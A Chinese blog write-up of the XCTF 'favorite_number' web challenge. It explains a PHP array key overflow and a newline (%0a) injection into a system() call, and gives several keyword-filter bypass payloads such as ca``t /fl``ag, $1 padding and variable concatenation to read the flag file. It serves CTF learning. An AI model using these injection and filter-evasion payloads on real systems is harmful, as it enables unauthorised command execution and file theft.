xctf攻防世界 Web高手进阶区 favorite_number

2024-01-31 05:20

本文主要是介绍xctf攻防世界 Web高手进阶区 favorite_number,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

作为一个新手,一路走来,人都麻了,就当积累知识点了!

1. 进入到题目场景,看到代码,因此想到代码审计

在这里插入图片描述

2.尝试分析代码

<?php
//php5.5.9
$stuff = $_POST["stuff"];  // 接收POST传过的参数,key为"stuff"
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') { // stuff的参数要与array恒等,且stuff数组第一个参数不能为admin$num= $_POST["num"]; // 接收POST传过的参数,key为"num"if (preg_match("/^\d+$/im",$num)){ // 正则匹配numif (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){ // 用于过滤命令符echo "my favorite num is:";system("echo ".$num);}else{echo 'Bonjour!';}}
} else {highlight_file(__FILE__);
}

3. 分析代码

1. 分析一:
if($stuff === $array && $stuff[0] != 'admin')

既要保证完全等于,又要求第一个元素不等!因此只能猜到数组方面存在的漏洞(至于什么漏洞,想不到),参考大佬们的解题思路,发现对该漏洞解释的博客:

  • PHP数组的key溢出问题.
  • PHP的信息安全(入侵获取$flag)的题目【Q2】.

也就是说,定义 stuff[4294967296]=‘admin’ ,保证stuff[0]!=amdin$stuff === $array。(这点我还是没看懂为什么,求大佬科普一下)

于是构造post的payload参数:

stuff[4294967296]=admin&stuff[1]=user

2. 分析二:

preg_match("/^\d+$/im",$num)

其中/^表示正则匹配字符串的起始部分,\d表示匹配任何十进制数字,+表示匹配1次或者多次前面出现的表达式,$表示匹配字符串终止部分,/im中i(ignore)表示执行大小写不敏感的匹配,m(multiple)表示允许多行匹配。

但是我们需要字符去执行命令,因此^和$不只是匹配字符串的开头和结尾,也匹配一行的开头和一行的结尾。因此我们利用 %0a 换一行,把命令写在其他的行,这样这个正则匹配就只能匹配到第一行了。(%0A在ASCII表中表示换行符)

*注意:此处的hackbar不知道为啥,掉链子显示不出来,因此用burpsuite改包去操作

3. 分析三

preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)

对关键字符命令进行过滤,如果num中出现诸如此类的字符,则直接过滤掉

4. 使用burpsuite

1. 正常抓包

在这里插入图片描述

2. 修改payload

在这里插入图片描述

3. 绕过

如何可以对内容绕过,参考大佬的博客特殊字符绕过
我们可以利用这些方式来绕过(不考虑编码绕过之类的):

ca''t
cat""t
ca\t
ca``t    # 两个反斜点也可以

因此我们构造payload

stuff[4294967296]=admin&stuff[1]=user&num=123456%0Aca``t /fl``ag

如图:
在这里插入图片描述

4. 其他解决方法拓展(参考大佬的博客)
  1. 利用过滤字符

$*和$@,$x(x 代表 1-9),${x}(x>=10) :比如ca${21}t a.txt表示cat a.txt 在没有传入参数的情况下,这些特殊字符默认为空

num=1%0aca$1t /fl$1ag
num=1%0aca$@t /fl$@ag

本题中的{}符号已被过滤

  1. 利用文件的iNode号
    在这里插入图片描述

在这里插入图片描述
cat既然被过滤了,那就用tac绕过,然后利用反引号来读文件:
在这里插入图片描述

  1. 也是一种比较常用的方法,既然过滤了flag,而又没过滤$,就可以用变量拼接:
num=1%0Aa=f;b=lag;tac /$a$b;

如图:
在这里插入图片描述

5. 总结

  • 考察数字漏洞
  • 正则表达
  • 基本命令

我是跪着看完写完的,太难了o(╥﹏╥)o,如有问题,恳请批评指正

这篇关于xctf攻防世界 Web高手进阶区 favorite_number的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/662674

相关文章

Spring Security 从入门到进阶系列教程

Spring Security 入门系列 《保护 Web 应用的安全》 《Spring-Security-入门(一):登录与退出》 《Spring-Security-入门(二):基于数据库验证》 《Spring-Security-入门(三):密码加密》 《Spring-Security-入门(四):自定义-Filter》 《Spring-Security-入门(五):在 Sprin

Java进阶13讲__第12讲_1/2

多线程、线程池 1.  线程概念 1.1  什么是线程 1.2  线程的好处 2.   创建线程的三种方式 注意事项 2.1  继承Thread类 2.1.1 认识  2.1.2  编码实现  package cn.hdc.oop10.Thread;import org.slf4j.Logger;import org.slf4j.LoggerFactory

揭秘世界上那些同时横跨两大洲的国家

我们在《世界人口过亿的一级行政区分布》盘点全球是那些人口过亿的一级行政区。 现在我们介绍五个横跨两州的国家,并整理七大洲和这些国家的KML矢量数据分析分享给大家,如果你需要这些数据,请在文末查看领取方式。 世界上横跨两大洲的国家 地球被分为七个大洲分别是亚洲、欧洲、北美洲、南美洲、非洲、大洋洲和南极洲。 七大洲示意图 其中,南极洲是无人居住的大陆,而其他六个大洲则孕育了众多国家和

usaco 1.2 Name That Number(数字字母转化)

巧妙的利用code[b[0]-'A'] 将字符ABC...Z转换为数字 需要注意的是重新开一个数组 c [ ] 存储字符串 应人为的在末尾附上 ‘ \ 0 ’ 详见代码: /*ID: who jayLANG: C++TASK: namenum*/#include<stdio.h>#include<string.h>int main(){FILE *fin = fopen (

Java Web指的是什么

Java Web指的是使用Java技术进行Web开发的一种方式。Java在Web开发领域有着广泛的应用,主要通过Java EE(Enterprise Edition)平台来实现。  主要特点和技术包括: 1. Servlets和JSP:     Servlets 是Java编写的服务器端程序,用于处理客户端请求和生成动态网页内容。     JSP(JavaServer Pages)

[MySQL表的增删改查-进阶]

🌈个人主页:努力学编程’ ⛅个人推荐: c语言从初阶到进阶 JavaEE详解 数据结构 ⚡学好数据结构,刷题刻不容缓:点击一起刷题 🌙心灵鸡汤:总有人要赢,为什么不能是我呢 💻💻💻数据库约束 🔭🔭🔭约束类型 not null: 指示某列不能存储 NULL 值unique: 保证某列的每行必须有唯一的值default: 规定没有给列赋值时的默认值.primary key:

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

【Linux 从基础到进阶】Ansible自动化运维工具使用

Ansible自动化运维工具使用 Ansible 是一款开源的自动化运维工具,采用无代理架构(agentless),基于 SSH 连接进行管理,具有简单易用、灵活强大、可扩展性高等特点。它广泛用于服务器管理、应用部署、配置管理等任务。本文将介绍 Ansible 的安装、基本使用方法及一些实际运维场景中的应用,旨在帮助运维人员快速上手并熟练运用 Ansible。 1. Ansible的核心概念

Flutter 进阶:绘制加载动画

绘制加载动画:由小圆组成的大圆 1. 定义 LoadingScreen 类2. 实现 _LoadingScreenState 类3. 定义 LoadingPainter 类4. 总结 实现加载动画 我们需要定义两个类:LoadingScreen 和 LoadingPainter。LoadingScreen 负责控制动画的状态,而 LoadingPainter 则负责绘制动画。

题目1380:lucky number

题目1380:lucky number 时间限制:3 秒 内存限制:3 兆 特殊判题:否 提交:2839 解决:300 题目描述: 每个人有自己的lucky number,小A也一样。不过他的lucky number定义不一样。他认为一个序列中某些数出现的次数为n的话,都是他的lucky number。但是,现在这个序列很大,他无法快速找到所有lucky number。既然